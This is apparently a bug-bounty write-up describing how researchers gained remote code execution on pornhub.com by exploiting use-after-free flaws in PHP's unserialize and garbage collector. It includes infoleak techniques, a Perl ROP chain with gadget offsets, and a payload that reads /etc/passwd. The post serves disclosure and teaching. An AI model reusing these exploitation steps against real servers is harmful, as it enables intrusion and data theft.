How we broke PHP, hacked Pornhub and earned $20,000

It all started by auditing Pornhub, then PHP and ended in breaking both…

tl;dr:

We have gained remote code execution on pornhub.com and have earned a $20,000 bug bounty on Hackerone.

We have found two use-after-free vulnerabilities in PHP’s garbage collection algorithm.

Those vulnerabilities were remotely exploitable over PHP’s unserialize function.

We were also awarded with $2,000 by the Internet Bug Bounty committee (c.f. Hackerone).

Credits:

This project was realized by Dario Weißer (@haxonaut), cutz and Ruslan Habalov (@evonide).
Many thanks go out to cutz for co-authoring this article.

Pornhub’s bug bounty program and its relatively high rewards on Hackerone caught our attention. That’s why we have taken the perspective of an advanced attacker with the full intent to get as deep as possible into the system, focusing on one main goal: gaining remote code execution capabilities. Thus, we left no stone unturned and attacked what Pornhub is built upon: PHP.

Standard exploitation techniques require so called Property-Oriented-Programming (POP) that involve abusing already existing classes with specifically defined “magic methods” in order to trigger unwanted and malicious code paths. Unfortunately, it was difficult for us to gather any information about Pornhub’s used frameworks and PHP objects in general. Multiple classes from common frameworks have been tested — all without success.

Bug description

The core unserializer alone is relatively complex as it involves more than 1200 lines of code in PHP 5.6. Further, many internal PHP classes have their own unserialize methods. By supporting structures like objects, arrays, integers, strings or even references it is no surprise that PHP’s track record shows a tendency for bugs and memory corruption vulnerabilities. Sadly, there were no known vulnerabilities of such type for newer PHP versions like PHP 5.6 or PHP 7, especially because unserialize already got a lot of attention in the past (e.g. phpcodz). Hence, auditing it can be compared to squeezing an already tightly squeezed lemon. Finally, after so much attention and so many security fixes its vulnerability potential should have been drained out and it should be secure, shouldn’t it?

Fuzzing unserialize

To find an answer Dario implemented a fuzzer crafted specifically for fuzzing serialized strings which were passed to unserialize. Running the fuzzer with PHP 7 immediately lead to unexpected behavior. This behavior was not reproducible when tested against Pornhub’s server though. Thus, we assumed a PHP 5 version.

However, running the fuzzer against a newer version of PHP 5 just generated more than 1 TB of logs without any success. Eventually, after putting more and more effort into fuzzing we’ve stumbled upon unexpected behavior again. Several questions had to be answered: is the issue security related? If so can we only exploit it locally or also remotely? To further complicate this situation the fuzzer did generate non-printable data blobs with sizes of more than 200 KB.

Analyzing unexpected behavior

A tremendous amount of time was necessary to analyze potential issues. After all, we could extract a concise proof of concept of a working memory corruption bug — a so called use-after-free vulnerability! Upon further investigation we discovered that the root cause could be found in PHP’s garbage collection algorithm, a component of PHP that is completely unrelated to unserialize. However, the interaction of both components occurred only after unserialize had finished its job. Consequently, it was not well suited for remote exploitation. After further analysis, gaining a deeper understanding for the problem’s root causes and a lot of hard work a similar use-after-free vulnerability was found that seemed to be promising for remote exploitation.

Exploitation

Even this promising use-after-free vulnerability was considerably difficult to exploit. In particular, it involved multiple exploitation stages.
Since our main goal was to execute arbitrary code we needed to somehow compromise the CPU’s instruction pointer referred to as RIP on x86_64. This usually involves the following obstacles:

The stack and heap (which also include any potential user-input) as well as any other writable segments are flagged non-executable (c.f. Executable space protection).

Even if you are able to control the instruction pointer you need to know what you want to execute i.e. you need to have a valid address of an executable memory segment. For this it is common to call the libc function system which will execute a shell command. In PHP context it is often enough to execute zend_eval_string which usually gets executed e.g. when you write “eval(‘echo 1337;’);” in a PHP script i.e. it allows us to execute arbitrary PHP code without having to transition into other involved libraries.

The first problem can be overcome by using Return-oriented programming (ROP) where you can utilize already existing and executable memory fragments from the binary itself or its libraries. The second problem, however, requires to find the correct address of zend_eval_string. Usually, when a dynamically linked program gets executed the loader will map the process to 0x400000 which is the standard load address on x86_64. In case you somehow already obtained the correct PHP executable (e.g. by finding the exact package that is shipped by the target) you can just locally lookup the offset for any function you want. We discovered that Pornhub was using a customly compiled version of php5-cgi, therefore making it difficult to determine the exact PHP version as well as getting any information at all about the memory layout of the whole PHP process.

Leaking the PHP binary and required pointers

Exploiting use-after-frees in PHP usually follows the same rules. As soon as you’re able to fill freed memory that later on gets reused as an internal PHP variable — so called zvals — you can generate vectors that allow reading from arbitrary memory as well as triggering code execution.

Preparing the memory disclosure

As previously mentioned we were required to obtain more information about Pornhub’s PHP binary. Therefore, the first step was to abuse the use-after-free to inject a zval that represents a PHP string. The definition of the zval structure looks like the following for PHP 5.6:

1

2

3

4

5

6

7

8

"Zend/zend.h"

[...]

struct_zval_struct{

zvalue_value value;/* value */

zend_uint refcount__gc;

zend_uchar type;/* active type */

zend_uchar is_ref__gc;

};

Whereas the zvalue_value field is defined as a union, hence making type juggling (and type confusions) easily possible.

1

2

3

4

5

6

7

8

9

10

11

12

13

"Zend/zend.h"

[...]

typedefunion_zvalue_value{

longlval;/* long value */

doubledval;/* double value */

struct{

char*val;

intlen;

}str;

HashTable *ht;/* hash table value */

zend_object_value obj;

zend_ast *ast;

}zvalue_value;

A PHP variable of type string is a zval of type 6. Consequently, it treats the union as a structure that contains a char pointer and a length field. So crafting a string zval with an arbitrary starting point and arbitrary length creates a powerful infoleak that gets triggered when Pornhub’s setcookie() reflects the injected zval in the response header.

Finding PHP’s image base

Usually, one can start by leaking the binary, which as stated before, begins at 0x400000. Unfortunately, Pornhub’s server used protection mechanisms like PIE and ASLR which randomize the image base of the process and its shared libraries. This also has become the default as more and more distributions ship packages that enable position independent code.

The next challenge was on: finding the correct loading address of the binary.

The first difficulty was to somehow obtain a single valid address we could start leaking from. Here it was helpful to know some details about PHP’s internal memory management. In particular, once a zval is freed PHP will overwrite its first eight bytes with an address to the previously freed chunk. Hence, a trick to obtain a first valid address is to create an integer zval, free this integer zval and finally use a dangling pointer to this zval to obtain its current value.

Since php-cgi implements multiple workers that simply get forked from a master process, the memory layout never really changes between different requests, as long as you keep sending data of the same size. That’s also why we could send request after request, each time leaking a different portion of memory by letting the fake zval string begin at different addresses. However, obtaining the heap address of a freed chunk is by its own right not enough to get any clues about the executable location. This is due to a lack of any useful information in the surroundings of that chunk.

To get interesting addresses, there is a relatively complicated technique which requires multiple frees and allocations of PHP structures during the unserialization process (c.f. ROP in PHP applications Slide 67). Due to the nature of our bug and to keep the complexity as low as possible we have used our own trick.

By using a serialized string like “i:0;a:0:{}i:0;a:0:{}[…]i:0;a:0:{}” as part of our overall unserialize payload we could force unserialize to create many empty arrays and free them once it terminated. When initializing an array PHP consecutively allocates memory for its zval and hashtable. One default hashtable entry for empty arrays is the uninitialized_bucket symbol. Overall, we were able to obtain a memory fragment that looked similar to the following:

1

2

3

4

5

6

7

8

9

10

11

0x7ffff7fc2fe0:0x00000000000000000x0000000000eae040

[...]

0x7ffff7fc3010:0x00007ffff7fc2b400x0000000000000000

0x7ffff7fc3020:0x00000001000000000x0000000000000000

0x7ffff7fc3030:# <--------- This address was leaked in a previous request.

0x7ffff7fc3040:0x00007ffff7fc2f480x0000000000000000

0x7ffff7fc3050:0x00000000000000000x0000000000000000

[...]

0x7ffff7fc30a0:0x0000000000eae0400x00000000006d5820

(gdb)x/xg0x0000000000eae040

0xeae040<uninitialized_bucket>:0x0000000000000000

The address 0xeae040 is PHP’s uninitialized_bucket symbol address and directly points into PHP’s BSS segment. You can see that it occurs multiple times in the neighborhood of the lastly freed chunk. As stated before, many empty arrays were freed. Thus, by abusing the circumstance that some hashtable entries remained unchanged in the heap we were able to leak this specific symbol.

Finally, we could apply a page-wise backwards scan starting from the uninitialized_bucket symbol address to find the ELF header:

1

2

3

$start&=0xfffffffffffff000;

$pages+=0x1000whileleak($start-$pages,4)!~/^\x7fELF/;

return$start-$pages;

Leaking interesting PHP binary segments

At this point our situation further complicated things as we were only able to leak 1 KB of data per request (this is due to enforced header size limitations by Pornhub’s web server). A PHP binary can take up to about 30 MB of size. Assuming one request per second the leaking would have taken about 8 hours and 20 minutes to complete. As we were afraid that our exploitation process could get interrupted at any time it was essential to act as fast and as stealthy as possible. This is why we were required to implement some heuristics to guess/filter likely interesting sections in advance. Nevertheless, we could resolve any structure that was referenced in the ELF’s string and symbol table. There are other techniques like ret2dlresolve that allow omitting the whole leaking process, but they weren’t entirely applicable here since they require crafting more data structures and require knowledge about different memory locations.

To get the address of zend_eval_string you’d first have to find the ELF program headers which are at offset 32, then scan forward until you find a program header entry of type 2 (PT_DYNAMIC) to get the ELF’s dynamic section. This section finally contains a reference to the string and symbol table (type 5 and 6) which you can completely dump by using their size fields and grab any function whose virtual address you desire. Alternatively, you can also use the hashtable (DT_HASH) to find functions more quickly, but in this scenario it doesn’t matter much since you can quickly traverse the tables locally anyway. In addition to zend_eval_string we were interested in further symbols and the location of our POST variables (because they were supposed to be used as a ROP stack later on).

Leaking the address of our POST data

To get the address of the supplied POST data you can just leak some more pointers by reading from:

Traversing this chain looks complicated, but you just need to dereference a few pointers with the correct offset and you’ll quickly find the stdin:// stream which points to the POST data inside the heap.

Preparing the ROP payload

The second part deals with actually taking control over the PHP process and gaining code execution. For this to happen we need to discuss how one can modify the instruction pointer first.

Taking over the instruction pointer

We adjusted our payload to contain a fake object (instead of the previously used string zval) with a pointer to a specially crafted zend_object_handlers table. This table is, in its essence, an array of function pointers whose structure definition can be found in:

1

2

3

4

5

6

"Zend/zend_object_handlers.h"

[...]

struct_zend_object_handlers{

zend_object_add_ref_t add_ref;

[...]

};

When creating such a faked zend_object_handlers table we can simply setup add_ref however we prefer. The function behind this pointer usually handles the incrementation of the object’s reference counter. Once our created fake object gets passed as a parameter to “setcookie” the following things happen:

Here, according to “s|sl[…]” one can see that “setcookie” is expecting a string as its first and second parameter (| marks the start of optional parameters). Hence, it will try to cast our object which is passed as the second parameter into a string. Finally, _zval_copy_ctor will then execute:

1

2

3

4

5

6

7

8

9

10

11

"Zend/zend_variables.c"

[...]

ZEND_API void_zval_copy_ctor_func(zval *zvalue ZEND_FILE_LINE_DC)

{

[...]

caseIS_OBJECT:

{

TSRMLS_FETCH();

Z_OBJ_HT_P(zvalue)->add_ref(zvalue TSRMLS_CC);

[...]

}

In particular, this will make a call to the provided add_ref function with the address of our object as a parameter (c.f. PHP Internals Book – Copying zvals to see an explanation). The corresponding assembly looks like:

1

2

<_zval_copy_ctor_func+288>:mov0x8(%rdi),%rax

<_zval_copy_ctor_func+292>:callq*(%rax)

Here, RDI is the first argument to the _zval_copy_ctor_func function which also is the address of our fake object zval (zvalue in the source code above). As previously seen in the definition of the _zvalue_value typedef, an object contains an element called obj of type zend_object_value which is defined as follows:

1

2

3

4

5

6

"Zend/zend_types.h"

[...]

typedefstruct_zend_object_value{

zend_object_handle handle;

constzend_object_handlers*handlers;

}zend_object_value;

Thus, 0x8(%rdi) will point to the second entry in _zend_object_value which corresponds to the address of our first zend_object_handlers entry. As mentioned before, this entry is our custom add_ref function and explains why we have direct control over RAX, too.

To bypass the previously discussed non-executable memory problem we had to obtain further information. In particular, we needed to collect useful gadgets and prepare stack pivoting for our ROP chain since there wasn’t enough control over the stack yet.

Leaking ROP gadgets

Now we could setup the add_ref pointer, or RAX respectively, to take over the instruction pointer. Although this gives you a starting point it doesn’t ensure that all of your provided ROP gadgets are executed because the CPU will pop the next instruction’s address from the current stack once returning from the first gadget. We don’t have any control over this stack, so consequently, it was necessary to pivot the stack into our ROP chain. This is why the next step was to copy RAX into RSP and continue ropping from there. Using a locally compiled version of PHP we scanned for good candidates for stack pivoting gadgets and found that php_stream_bucket_split contained the following piece of code:

1

2

3

4

5

6

7

<php_stream_bucket_split+381>:push%rax#<------------

<php_stream_bucket_split+382>:sub$0x31,%al

<php_stream_bucket_split+384>:rcrb$0x41,0x5d(%rbx)

<php_stream_bucket_split+388>:pop%rsp#<------------

<php_stream_bucket_split+389>:pop%r13

<php_stream_bucket_split+391>:pop%r14

<php_stream_bucket_split+393>:retq

This was used to nicely modify RSP to point to our by POST data provided ROP chain, effectively chaining all provided gadget calls.

According to the x86_64 calling convention the first two parameters of a function are RDI and RSI, so we had to find a pop %rdi and pop %rsi gadget, too. Those are pretty common and thus easily found. However, we still had no idea if those gadgets actually existed on Pornhub’s version of PHP. Therefore, we had to manually verify their presence.

Verifying the presence of the required ROP gadgets

The infoleak vector allowed us to quickly dump the disassembly of php_stream_bucket_split and check if our stack pivoting gadget was available on the remote version. Fortunately, only little corrections of the gadgets’ offsets were necessary. Finally, we implemented some checks to confirm that all addresses were correct:

Crafting the ROP stack

The final ROP payload that effectively executed zend_eval_string(code); exit(0); looked like the following snippet:

1

2

3

4

5

6

7

8

9

10

11

12

my$rop="";

$rop.=pack('Q',$php_base+0x51a71f);# pivot rsp

$rop.=pack('Q',0xdeadbeef);# junk

$rop.=pack('Q',$php_base+0x2b904e);# pop rdi

$rop.=pack('Q',$post_addr+length($rop)+8*7);# pointing to $php_code

$rop.=pack('Q',$php_base+0x50ee0c);# pop rsi

$rop.=pack('Q',0);# retval_ptr

$rop.=pack('Q',$zend_eval_string);# zend_eval_string

$rop.=pack('Q',$php_base+0x2b904e);# pop rdi

$rop.=pack('Q',0);# exit code

$rop.=pack('Q',$exit);# exit

$rop.=$php_code."\x00";

Because the stack pivot contained a pop %r13 and pop %r14 the 0xdeadbeef paddinginside the remaining chain was necessary to continue with setting RDI. As the first parameter to zend_eval_string RDI is required to reference the code that is to be executed. This code is located right after the ROP chain. It was also required to keep sending the exact same amount of data between each request so that all calculated offsets stayed correct. This was achieved by setting up different paddings wherever it was necessary.

The next step was to finally trigger code execution by returning back into the PHP interpreter. Actually, other techniques like return2libc are quite applicable as well but create a few other problems that are easier dealt with when staying in PHP context.

Returning into PHP

Being able to execute arbitrary PHP code is an important step, but being able to view its output is equally important, unless one wants to deal with side channels to receive responses. So the remaining tricky part was to somehow display the result on Pornhub’s website.

Clean termination of PHP

Usually php-cgi forwards the generated content back to the web server so that it’s displayed on the website, but wrecking the control flow that badly creates an abnormal termination of PHP so that its result will never reach the HTTP server. To get around this problem we simply told PHP to use direct unbuffered responses that are usually used for HTTP streaming:

1

2

3

4

5

6

7

8

9

10

my$php_code='eval(\'

header("X-Accel-Buffering: no");

header("Content-Encoding: none");

header("Connection: close");

error_reporting(0);

echo file_get_contents("/etc/passwd");

ob_end_flush();

ob_flush();

flush();

\');';

This finally allowed us to directly fetch every output the PHP payload generated without having to worry about the cleanup routines that are usually involved when the CGI process sends data to the web server. This further increased the stealthiness factor by minimizing the number of potential errors and crashes.

To summarize, our payload contained a fake object with its add_ref function pointer pointing to our first ROP gadget. The following diagram visualizes this concept:

Final version of the crafted zval object

Together with our ROP stack which was provided over POST data our payload did the following things:

Created our fake object which was later on passed as a parameter to “setcookie”.

This caused a call to the provided add_ref function i.e. it allowed us to gain program counter control.

Our ROP chain then prepared all registers/parameters as discussed.

Next, we were able to execute arbitrary PHP code by making a call to zend_eval_string.

Finally, we caused a clean process termination while also fetching the output from the response body.

Once running the above code we were in and got a nice view of Pornhub’s ‘/etc/passwd’ file. Due to the nature of our attack we would have also been able to execute other commands or actually break out of PHP to run arbitrary syscalls. However, just using PHP was more convenient at this point. Finally, we dumped a few details about the underlying system and immediately wrote and submitted a report to Pornhub over Hackerone.

Timeline

Here is the timeline of the disclosure process:

2016-05-30 Hacked Pornhub and submitted the issue over Hackerone. Hours later Pornhub quickly fixed the issue by removing calls to unserialize

2016-06-14 Received a reward of $20,000

2016-06-16 Submitted issues to bugs.php.net

2016-06-21 Both bugs got fixed in PHP’s security repository

2016-06-27 Received Hackerone IBB reward of $2,000 ($1,000 for each vulnerability)

2016-07-22 Pornhub resolved the issue on Hackerone

Conclusion

We gained remote code execution and would’ve been able to do the following things:

Dump the complete database of pornhub.com including all sensitive user information.

Track and observe user behavior on the platform.

Leak the complete available source code of all sites hosted on the server.

Escalate further into the network or root the system.

Of course none of the above things were done and very careful attention was paid to respect the scope and limitations of the bug bounty program.
Further, we were able to find two zero day vulnerabilities in PHP’s garbage collection algorithm. Those vulnerabilities, although being in a very different PHP context, could be reliably and remotely exploited in an unserialize context, too.

It is well-known that using user input on unserialize is a bad idea. In particular, about 10 years have passed since its first weaknesses have become apparent. Unfortunately, even today, many developers seem to believe that unserialize is only dangerous in old PHP versions or when combined with unsafe classes. We sincerely hope to have destroyed this misbelief. Please finally put a nail into unserialize’s coffin so that the following mantra becomes obsolete.

You should never use user input on unserialize. Assuming that using an up-to-date PHP version is enough to protect unserialize in such scenarios is a bad idea. Avoid it or use less complex serialization methods like JSON.

Actually caring about security (and not just pretending like many other companies do nowadays).

Being very generous regarding the bounty of $20,000.
According to Sinthetic Labs’s Public Hackerone Reports last update we are grateful to see that this submission seems to be heads on with the ShellShock vulnerability submission for being one of the highest paid public bounties on Hackerone so far.

Further, many thanks go out to the PHP developers for quickly deploying the fix and the Internet Bug Bounty committee for awarding us with $2,000.

Finally, we want to highlight the necessity of such programs. As you can see, offering high bug bounties can motivate security researchers to find bugs in underlying software. This positively impacts other sites and unrelated services as well.

Please don’t forget to checkout our two other write-ups regarding the PHP bugs and their discovery.

34 Comments

Goes above my head although been using PHP for almost 4 years. I would appreciate if you can write a beginner level article about how to do exploits or what path should we follow to reach this level. Thanks

Best writeup I read for a long time. You put much effort in this…finding useable UAF vulns seems to be a complex task. I’m wondering how nany days you spent in fuzzing and manual review of PHP code. Again…nice work and sharing this helps others to get a better understanding if techniques involved and thus keeping things more secure

Hey guys.
Really nice exploitation. I was investigating the same issue but I could only leak the exception details and fingerprint some of the PHP classes used by PornHub.
Well done for your extra mile 🙂